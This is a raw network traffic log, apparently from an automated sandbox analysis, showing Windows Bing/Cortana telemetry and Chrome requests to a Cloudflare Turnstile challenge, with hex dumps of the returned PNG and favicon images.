                                                                                                                                                                                                                                                                                                              X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:2C89765
                                                                                                                                                                                                                                                                                                              X-Device-ClientSession: 8B0BADD9680C444587B50653454AB647
                                                                                                                                                                                                                                                                                                              X-Device-isOptin: false
                                                                                                                                                                                                                                                                                                              X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}
                                                                                                                                                                                                                                                                                                              X-Device-OSSKU: 48
                                                                                                                                                                                                                                                                                                              X-Device-Touch: false
                                                                                                                                                                                                                                                                                                              X-DeviceID: 01000A4109009A83
                                                                                                                                                                                                                                                                                                              X-MSEdge-ExternalExp: bfbscope1003t3,bfbwsbpphmemqcf,bfbwsbrs0830cf,d-thshld78,d-thshldspcl40,disfbcthas2_1,fliptrat6,spofglclicksh-c2,wsbqfasmsall_c,wsbref-c
                                                                                                                                                                                                                                                                                                              X-MSEdge-ExternalExpType: JointCoord
                                                                                                                                                                                                                                                                                                              X-PositionerType: Desktop
                                                                                                                                                                                                                                                                                                              X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
                                                                                                                                                                                                                                                                                                              X-Search-CortanaAvailableCapabilities: None
                                                                                                                                                                                                                                                                                                              X-Search-SafeSearch: Moderate
                                                                                                                                                                                                                                                                                                              X-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard Time
                                                                                                                                                                                                                                                                                                              X-UserAgeClass: Unknown
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                                                                                                                                                              Host: www.bing.com
                                                                                                                                                                                                                                                                                                              Content-Length: 608
                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                              Cookie: SRCHUID=V=2&GUID=1365D4FE3DA84D19A46408EFC15FC823&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231006; SRCHHPGUSR=SRCHLANG=en&HV=1696584863&IPMH=5e4190f4&IPMID=1696585056345&LUT=1696585056224; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=1F9344FA7B5C6D050D8557587A606C51&CPID=1696585056799&AC=1&CPH=074c06b2&CBV=39996767; _EDGE_S=SID=1F9344FA7B5C6D050D8557587A606C51; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:18 UTC211OUTData Raw: 3c
                                                                                                                                                                                                                                                                                                              Data Ascii: <
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:18 UTC211OUTData Raw: 43 6c 69 65 6e 74 49 6e 73 74 52 65 71 75 65 73 74 3e 3c 43 49 44 3e 35 30 34 37 45 35 39 34 32 42 42 32 34 36 30 45 41 33 35 42 35 33 43 43 46 37 38 44 44 42 33 44 3c 2f 43 49 44 3e 3c 45 76 65 6e 74 73 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 6c 69 65 6e 74 49 6e 73 74 3c 2f 54 3e 3c 49 47 3e 36 34 38 31 41 46 33 32 31 31 46 30 34 33 44 41 39 30 30 39 46 46 31 30 39 32 45 43 36 45 36 46 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 54 22 3a 22 43 49 2e 42 6f 78 4d 6f 64 65 6c 22 2c 22 46 49 44 22 3a 22 43 49
                                                                                                                                                                                                                                                                                                              Data Ascii: ClientInstRequest><CID>5047E5942BB2460EA35B53CCF78DDB3D</CID><Events><E><T>Event.ClientInst</T><IG>6481AF3211F043DA9009FF1092EC6E6F</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","T":"CI.BoxModel","FID":"CI
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:18 UTC212INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                              X-MSEdge-Ref: Ref A: 46947CB00C1D4FD88E0E2C7D222AF744 Ref B: DFW30EDGE1719 Ref C: 2023-10-25T16:27:18Z
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:27:18 GMT
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=93600
                                                                                                                                                                                                                                                                                                              X-CDN-TraceID: 0.15ed0117.1698251238.b8fc1cd


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              90192.168.2.1649813104.17.3.184443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:42 UTC1274OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1490923123:1698250217:y5wy3T9Zh5LE93RSXoIMvIzVSf_O0VV8iCypRe9eLoA/81bbd40e1eca59f1/c7b054a34972c39 HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              Content-Length: 2378
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              CF-Challenge: c7b054a34972c39
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Origin: https://challenges.cloudflare.com
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/scl0v/0x4AAAAAAALzWnvdFcCpJJ1T/auto/normal
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:42 UTC1275OUTData Raw: 76 5f 38 31 62 62 64 34 30 65 31 65 63 61 35 39 66 31 3d 79 67 45 47 34 47 6d 47 4b 47 24 47 75 4f 4a 59 64 4a 70 64 4a 43 47 64 78 32 6e 6b 4b 64 4d 4a 32 47 35 7a 67 64 63 45 4a 79 64 55 4a 42 6e 4a 74 69 4a 6b 42 24 4a 42 74 45 6d 64 6d 76 45 43 4a 42 47 64 57 4a 71 33 58 4c 46 33 4a 57 74 50 4a 72 47 57 4b 4a 59 47 32 76 53 42 4a 4a 59 48 4a 47 47 4c 57 4a 4d 47 64 4b 63 44 32 68 4d 78 4a 33 4a 42 67 58 25 32 62 34 4a 45 74 53 61 6f 64 4a 6b 37 4a 46 47 55 76 37 52 41 42 4a 4c 6a 55 6f 75 78 4a 64 58 4a 41 79 70 52 5a 6e 58 4a 6c 4e 65 65 45 6e 66 65 4a 39 58 4a 38 4c 70 6f 57 5a 47 4a 72 31 76 6f 70 64 59 41 35 34 42 24 4a 57 4b 68 58 46 47 4a 54 4a 6b 57 4a 37 66 4f 71 4a 4d 48 63 37 78 33 35 79 68 24 64 65 45 5a 69 52 45 4f 37 2d 4a 7a 62 37 6c 43
                                                                                                                                                                                                                                                                                                              Data Ascii: v_81bbd40e1eca59f1=ygEG4GmGKG$GuOJYdJpdJCGdx2nkKdMJ2G5zgdcEJydUJBnJtiJkB$JBtEmdmvECJBGdWJq3XLF3JWtPJrGWKJYG2vSBJJYHJGGLWJMGdKcD2hMxJ3JBgX%2b4JEtSaodJk7JFGUv7RABJLjUouxJdXJAypRZnXJlNeeEnfeJ9XJ8LpoWZGJr1vopdYA54B$JWKhXFGJTJkWJ7fOqJMHc7x35yh$deEZiREO7-Jzb7lC


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              91104.17.2.184443192.168.2.1649811C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:42 UTC1277INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:27:42 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: image/png
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              cache-control: max-age=2629800, public
                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                              CF-RAY: 81bbd414c8bc8254-IAD
                                                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:42 UTC1277INData Raw: 33 64 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 3dPNGIHDRsIDAT$IENDB`
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:42 UTC1277INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              92104.21.0.95443192.168.2.1649812C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:42 UTC1277INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:27:42 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: image/x-icon
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Last-Modified: Wed, 16 Aug 2023 15:22:46 GMT
                                                                                                                                                                                                                                                                                                              ETag: W/"86be-6030bde212b57"
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                                              Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                                                                                                                                                                                              Cache-Control: max-age=14400
                                                                                                                                                                                                                                                                                                              Age: 3300
                                                                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BLY%2FSeoNYzUKWCZ95utoBU7xH1AFQ0GAA1b4pr%2F7AFCAHLZy0L2ll5e9kdJoUWCQGBk3zHvNf3hseEjrHiPJX7PFM80pq4Ot7KW%2F8lgmE3Ntd1s4OLuaLoQogYeZsowfPSxuHrN4uDERSSs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                              CF-RAY: 81bbd41579d207a0-IAD
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:42 UTC1278INData Raw: 37 63 32 34 0d 0a 00 00 01 00 05 00 10 10 00 00 01 00 20 00 68 04 00 00 56 00 00 00 18 18 00 00 01 00 20 00 88 09 00 00 be 04 00 00 20 20 00 00 01 00 20 00 a8 10 00 00 46 0e 00 00 30 30 00 00 01 00 20 00 a8 25 00 00 ee 1e 00 00 40 40 00 00 01 00 20 00 28 42 00 00 96 44 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff
                                                                                                                                                                                                                                                                                                              Data Ascii: 7c24 hV F00 %@@ (BD(
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:42 UTC1278INData Raw: 82 f5 ff 42 95 f6 ff cc e9 fd ff 4e b4 fb ff 40 ae fb ff 40 ae fb ff 73 c3 fc bc d1 e5 fc 36 2e 8a f5 f0 20 82 f5 ff 20 82 f5 ff 3f 93 f6 ff 5b a3 f7 ff 61 a6 f7 ff 67 a9 f8 ff 6c ad f8 ff 72 b0 f8 ff 90 c0 fa ff f1 f7 fe ff be e3 fd ff 7d c8 fc ff 4d b3 fb ff 9a d4 fc 88 ff ff ff 00 f0 f6 fe 14 6d ad f8 aa 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 5b a3 f7 ff 6a bf fb ff 40 ae fb ff 64 bd fb d0 f3 f9 fe 12 ff ff ff 00 ff ff ff 00 bb d9 fb 50 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff b2 db fc 90 bf e3 fd 58 fa fc fe 08 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 d1 e5 fc 36 c2 dd fc 48 66 a9 f8 b2 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff
                                                                                                                                                                                                                                                                                                              Data Ascii: BN@@s6. ?[aglr}Mm [j@dP X6Hf
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:42 UTC1280INData Raw: fc 48 c3 dd fc 48 c3 dd fc 48 c3 dd fc 48 c3 dd fc 48 c3 dd fc 48 c3 dd fc 48 c3 dd fc 48 c3 dd fc 48 c3 dd fc 48 c3 dd fc 48 e8 f3 fe 48 cb e9 fd 48 cb e9 fd 48 cb e9 fd 48 cb e9 fd 48 cb e9 fd 48 cb e9 fd 48 e8 f5 fe 20 6b ac f8 ac 20 82 f5 ff 20 81 f4 ff 20 81 f4 ff 20 82 f5 ff 20 81 f4 ff 20 81 f4 ff 20 82 f5 ff 20 81 f4 ff 20 81 f4 ff 20 82 f5 ff 20 81 f4 ff 20 81 f4 ff 20 81 f4 ff 20 81 f4 ff 20 81 f4 ff a3 cc fb ff 53 b6 fb ff 40 ad fa ff 40 ad fa ff 40 ad fa ff 40 ad fa ff 40 ad fa ff 92 d0 fc 94 92 c2 fa 80 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 27 86 f5 ff cd e3 fc ff da ef fe ff 5f bb fb ff 40 ae fb ff 40 ae fb ff 40
                                                                                                                                                                                                                                                                                                              Data Ascii: HHHHHHHHHHHHHHHHHH k S@@@@@ '_@@@
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:42 UTC1281INData Raw: 02 ff ff ff 02 fe fe fe 02 ff ff ff 02 ff ff ff 02 fe fe fe 02 ff ff ff 02 ff ff ff 02 fe fe fe 02 ff ff ff 02 ff ff ff 02 fe fe fe 02 ff ff ff 02 fe fe fe 02 ff ff ff 00 fe fe fe 02 fe fe fe 02 ff ff ff 00 fe fe fe 02 fe fe fe 02 ff ff ff 00 fe fe fe 02 fe fe fe 02 ff ff ff 00 fe fe fe 02 ff ff ff 00 fe fe fe 02 ff ff ff 00 ff ff ff 00 fe fe fe 02 ff ff ff 00 ff ff ff 00 fe fe fe 02 ff ff ff 00 ff ff ff 00 fe fe fe 02 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 fe fe fe 00 ff ff ff 00 ff ff ff 00 fe fe fe 00 ff ff ff 00 ff ff ff 00 fe fe fe 00 ff ff ff 00 ff ff ff 00 fe fe fe 00 ff ff ff 00 fe fe fe 02 fe fe fe 02 fe fe fe 02 fe fe
                                                                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:42 UTC1282INData Raw: ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 fd fd fe 06 f9 fb fe 0c f9 fb fe 0c f9 fb fe 0c f9 fb fe 0c f9 fb fe 0c f9 fb fe 0c f9 fb fe 0c f9 fb fe 0c f9 fb fe 0c f9 fb fe 0c f9 fb fe 0c f9 fb fe 0c f9 fb fe 0c f9 fb fe 0c f9 fb fe 0c f9 fb fe 0c f9 fb fe 0c f9 fb fe 0c f9 fb fe 0c f9 fb fe 0c fc fd fe 0c fc fd fe 0c fa fd fe 0c fa fd fe 0c fa fd fe 0c fa fd fe 0c fa fd fe 0c fa fd fe 0c fa fd fe 0c fa fd fe 0c fe fe fe
                                                                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:42 UTC1284INData Raw: 82 f5 ff 20 82 f5 ff be da fc 56 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 d0 e4 fc 3a 78 b3 f8 9e 69 ab f8 ae a1 ca fa 70 70 af f8 a8 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 2f 8a f5 f0 f7 fa fe 0c ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 df ed fd 28 27 86 f5 f8 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff
                                                                                                                                                                                                                                                                                                              Data Ascii: V:xipp /('
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:42 UTC1285INData Raw: ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff
                                                                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:42 UTC1287INData Raw: 00 ff ff ff 00 ff ff ff 02 fe fe fe 00 ff ff ff 00 ff ff ff 02 fe fe fe 00 ff ff ff 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 02 fe fe fe 00 fe fe fe 00 ff ff ff 00 fe fe fe 00 fe fe fe 00 ff ff ff 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 00 fe fe fe 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff
                                                                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:42 UTC1288INData Raw: fe fe fe 00 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 00 fe fe fe 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 00 fe fe fe 02 ff ff ff 00 ff ff ff 00 fe fe fe 02 ff ff ff 00 fe fe fe 02 ff ff ff 00 fe fe fe 02 fe fe fe 02 ff ff ff 00 fe fe fe 02 ff ff ff 02 fe fe fe 00 ff ff ff
                                                                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:42 UTC1289INData Raw: 82 f5 ff 20 81 f4 ff 20 82 f5 ff 20 81 f4 ff 20 81 f4 ff 20 82 f5 ff 20 81 f4 ff 20 81 f4 ff 81 b8 f9 ff aa cf fb ff ac d0 fb ff af d2 fb ff b2 d4 fb ff b5 d5 fb ff b8 d7 fb ff bb d9 fb ff be da fc ff c1 dc fc ff c4 dd fc ff c7 df fc ff c9 e1 fc ff cc e2 fc ff cf e4 fc ff d2 e6 fd ff d5 e7 fd ff dc eb fd ff fc fd fe ff ff ff ff ff ff ff ff ff fe fe fe ff ff ff ff ff ff ff ff ff fe fe fe ff e6 f4 fe ff d8 ee fe ff cc e9 fd ff c1 e5 fd ff a6 d9 fd ff 40 ae fb ff 40 ae fa ff 40 ae fa ff 4c b3 fb f2 fd fe fe 06 fe fe fe 00 fe fe fe 02 86 bb f9 94 20 82 f5 ff 20 81 f4 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 2e 8a f5 ff 3d 92 f6 ff 3f 93 f6 ff 42 95 f6 ff 45 97 f6 ff 48 98 f6 ff 4b 9a f6 ff 4e 9b f7 ff
                                                                                                                                                                                                                                                                                                              Data Ascii: @@@L .=?BEHKN
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:42 UTC1291INData Raw: f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 98 c5 fa d6 d0 eb fe 68 b8 e1 fd 62 cc e9 fd 4a f3 f9 fe 14 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 00 fe fe fe 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 bf db fc 50 27 86 f5 fa 20 81 f4 ff 20 81 f4 ff 20 81 f4 ff 20 81 f4 ff 20 81 f4 ff 20 81 f4 ff 20 81 f4 ff 20 81 f4 ff 20 81 f4 ff 20 81 f4 ff 20 81 f4 ff 20 81 f4 ff 20 81 f4 ff 20 81 f4 ff 20 81 f4 ff 20 81 f4 ff 20 81 f4 ff 20
                                                                                                                                                                                                                                                                                                              Data Ascii: hbJP'
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:42 UTC1292INData Raw: 02 f7 fa fe 0c 7a b4 f9 a0 21 82 f5 ff 20 81 f4 ff 20 81 f4 ff 20 81 f4 ff 20 81 f4 ff 20 81 f4 ff 20 81 f4 ff 20 81 f4 ff 20 81 f4 ff 20 81 f4 ff 20 81 f4 ff 39 90 f6 e6 c4 de fc 4a ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 00 fe fe fe 02 ff ff ff 00 ff ff ff 00 fe fe fe 02 ff ff ff 00 fe fe fe 02 ff ff ff 00 fe fe fe 02 fe fe fe 02 ff ff ff 00 fe fe fe 02 ff ff ff 02 fe fe fe 00 ff ff ff 02 ff ff ff 02 fe fe fe 00 ff ff ff 02 ff ff ff 02 fe fe fe 00 cf e4 fc 3e 65 a9 f8 b6 24 84 f5 fc 20 81 f4 ff 20 81 f4 ff 20 82 f5 ff 20 81 f4 ff 20 81 f4 ff 20 82 f5 ff 39 90 f6 e6 95 c3 fa 80 f4 f9 fe 10 ff ff ff 02 ff ff
                                                                                                                                                                                                                                                                                                              Data Ascii: z! 9J>e$ 9
